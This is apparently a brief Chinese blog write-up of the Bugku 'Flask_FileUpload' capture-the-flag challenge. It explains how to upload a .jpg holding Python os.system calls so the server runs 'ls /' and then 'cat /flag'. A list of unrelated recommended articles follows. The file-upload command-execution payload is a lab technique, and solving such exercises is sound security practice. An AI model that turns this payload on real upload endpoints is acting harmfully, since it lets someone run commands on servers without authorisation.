Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码 
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码 
import os
os.system('cat /flag ')
相关推荐
火红色祥云6 分钟前
深度学习入门:基于Python的理论与实现笔记
笔记·python·深度学习
FoldWinCard6 分钟前
Python 第五次作业
linux·windows·python
Aliex_git9 分钟前
gzip 压缩实践笔记
前端·网络·笔记·学习
China_Yanhy9 分钟前
转型AI运维工程师·Day 10:拥抱“不确定性” —— 断点续训与 Spot 实例抢占
运维·人工智能·python
木昆子9 分钟前
实战A2UI:从JSON到像素——深入Lit渲染引擎
前端·人工智能
花酒锄作田11 分钟前
Flask - 常见应用部署方案
python·flask
an3174213 分钟前
React 页面加载埋点的正确姿势:useEffect 与 document.readyState 完美配合
前端·javascript·react.js
宝贝儿好14 分钟前
【强化学习】第九章:基于Action-Critic框架的强化学习
人工智能·python·深度学习·算法·动态规划
VXbishe19 分钟前
基于web的校园失物招领管理系统-计算机毕设 附源码 24150
javascript·vue.js·spring boot·python·node.js·php·html5
1024小神33 分钟前
vue3项目配置了子路由后刷新页面回到首页解决办法
前端·javascript·vue.js
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03爬虫逆向之观安(观镜WEB应用安全防护系统)04openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南05BongoCat - 跨平台键盘猫动画工具06HTB 赛季10 - Pterodactyl - user07UV安装并设置国内源08243 行 microGPT:把“训练 + 推理”拆到骨头里09openclaw配置教程(linux+局域网ollama)10openclaw 配置飞书 报错 应用未建立长连接